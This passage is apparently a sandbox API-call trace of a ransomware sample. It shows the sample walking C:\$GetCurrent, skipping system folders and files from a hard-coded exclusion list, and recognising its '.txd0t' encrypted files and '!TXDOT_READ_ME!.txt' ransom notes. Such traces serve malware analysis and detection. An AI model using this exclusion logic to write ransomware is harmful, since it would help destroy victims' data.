hFindFile=0xec1ef0 | out: hFindFile=0xec1ef0) returned 1 [0119.962] GetProcessHeap () returned 0xe30000 [0119.962] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xee8818 | out: hHeap=0xe30000) returned 1 Thread: id = 141 os_tid = 0xd70 [0128.322] GetProcessHeap () returned 0xe30000 [0128.322] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x486) returned 0xee8818 [0128.322] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.322] StrNCatW (in: psz1="C:", psz2="\\*", cchMax=1030 | out: psz1="C:\\*") returned="C:\\*" [0128.322] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0xec21f0 [0128.322] StrCmpW (psz1="$GetCurrent", psz2=".") returned -1 [0128.322] StrCmpW (psz1="$GetCurrent", psz2="..") returned -1 [0128.322] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.322] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0128.323] StrNCatW (in: psz1="C:\\", psz2="$GetCurrent", cchMax=1030 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\system32\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\system\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\local\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\boot\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\perflogs\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\programdata\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\drivers\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\wsus\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="crypt_detect") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="cryptolocker") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="ransomware") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\WINDOWS") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.323] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\Program Files") returned 0x0 [0128.323] GetProcessHeap () returned 0xe30000 [0128.323] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x49e) returned 0xf0daf8 [0128.323] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0128.323] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\*", cchMax=1054 | out: psz1="C:\\$GetCurrent\\*") returned="C:\\$GetCurrent\\*" [0128.323] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0128.324] StrCmpW (psz1=".", psz2=".") returned 0 [0128.324] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.324] StrCmpW (psz1="..", psz2=".") returned 1 [0128.324] StrCmpW (psz1="..", psz2="..") returned 0 [0128.324] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0128.324] StrCmpW (psz1="Logs", psz2=".") returned 1 [0128.324] StrCmpW (psz1="Logs", psz2="..") returned 1 [0128.324] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0128.324] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\", cchMax=1054 | out: psz1="C:\\$GetCurrent\\") returned="C:\\$GetCurrent\\" [0128.324] StrNCatW (in: psz1="C:\\$GetCurrent\\", psz2="Logs", cchMax=1054 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0128.324] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\system32\\") returned 0x0 [0128.324] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.324] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\system\\") returned 0x0 [0128.324] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\local\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\boot\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\perflogs\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\programdata\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\drivers\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\wsus\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="crypt_detect") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="cryptolocker") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="ransomware") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\WINDOWS") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.325] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\Program Files") returned 0x0 [0128.325] GetProcessHeap () returned 0xe30000 [0128.325] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a8) returned 0x6874278 [0128.325] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0128.325] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\*", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\*") returned="C:\\$GetCurrent\\Logs\\*" [0128.325] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.326] StrCmpW (psz1=".", psz2=".") returned 0 [0128.326] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.326] StrCmpW (psz1="..", psz2=".") returned 1 [0128.326] StrCmpW (psz1="..", psz2="..") returned 0 [0128.326] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57eac7c9, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x57eac7c9, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57eac7c9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.326] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.326] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.326] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0128.326] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0128.326] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\!TXDOT_READ_ME!.txt") returned="C:\\$GetCurrent\\Logs\\!TXDOT_READ_ME!.txt" [0128.326] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.326] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.326] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.326] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.326] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.327] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.327] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x58050289, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa8b2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log.txd0t", cAlternateFileName="DOWNLE~1.TXD")) returned 1 [0128.327] StrCmpW (psz1="downlevel_2017_09_07_02_02_39_766.log.txd0t", psz2=".") returned 1 [0128.327] StrCmpW (psz1="downlevel_2017_09_07_02_02_39_766.log.txd0t", psz2="..") returned 1 [0128.327] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0128.327] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0128.327] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="downlevel_2017_09_07_02_02_39_766.log.txd0t", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.txd0t") returned="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.txd0t" [0128.327] PathFindExtensionW (pszPath="downlevel_2017_09_07_02_02_39_766.log.txd0t") returned=".txd0t" [0128.327] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.327] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1974, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log.txd0t", cAlternateFileName="OOBE_2~1.TXD")) returned 1 [0128.327] StrCmpW (psz1="oobe_2017_09_07_03_08_57_737.log.txd0t", psz2=".") returned 1 [0128.327] StrCmpW (psz1="oobe_2017_09_07_03_08_57_737.log.txd0t", psz2="..") returned 1 [0128.327] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0128.327] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0128.327] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="oobe_2017_09_07_03_08_57_737.log.txd0t", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.txd0t") returned="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.txd0t" [0128.327] PathFindExtensionW (pszPath="oobe_2017_09_07_03_08_57_737.log.txd0t") returned=".txd0t" [0128.327] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.327] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x57e869e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x228, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.txd0t", cAlternateFileName="PARTNE~1.TXD")) returned 1 [0128.327] StrCmpW (psz1="PartnerSetupCompleteResult.log.txd0t", psz2=".") returned 1 [0128.327] StrCmpW (psz1="PartnerSetupCompleteResult.log.txd0t", psz2="..") returned 1 [0128.327] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0128.327] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0128.327] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="PartnerSetupCompleteResult.log.txd0t", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.txd0t") returned="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.txd0t" [0128.327] PathFindExtensionW (pszPath="PartnerSetupCompleteResult.log.txd0t") returned=".txd0t" [0128.327] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.328] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x57e869e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x228, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.txd0t", cAlternateFileName="PARTNE~1.TXD")) returned 0 [0128.328] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.328] GetProcessHeap () returned 0xe30000 [0128.328] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.328] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x57ed2a8a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0128.328] StrCmpW (psz1="SafeOS", psz2=".") returned 1 [0128.328] StrCmpW (psz1="SafeOS", psz2="..") returned 1 [0128.328] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0128.328] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\", cchMax=1054 | out: psz1="C:\\$GetCurrent\\") returned="C:\\$GetCurrent\\" [0128.328] StrNCatW (in: psz1="C:\\$GetCurrent\\", psz2="SafeOS", cchMax=1054 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\system32\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\system\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\local\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\boot\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\perflogs\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\programdata\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\drivers\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\wsus\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="crypt_detect") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="cryptolocker") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="ransomware") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\WINDOWS") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.328] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\Program Files") returned 0x0 [0128.329] GetProcessHeap () returned 0xe30000 [0128.329] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0x6874278 [0128.329] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0128.329] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\*", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\*") returned="C:\\$GetCurrent\\SafeOS\\*" [0128.329] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x57ed2a8a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.329] StrCmpW (psz1=".", psz2=".") returned 0 [0128.329] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x57ed2a8a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.329] StrCmpW (psz1="..", psz2=".") returned 1 [0128.329] StrCmpW (psz1="..", psz2="..") returned 0 [0128.329] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ed2a8a, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x57ed2a8a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.329] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.329] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.329] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0128.329] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0128.329] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\!TXDOT_READ_ME!.txt") returned="C:\\$GetCurrent\\SafeOS\\!TXDOT_READ_ME!.txt" [0128.329] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.329] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", 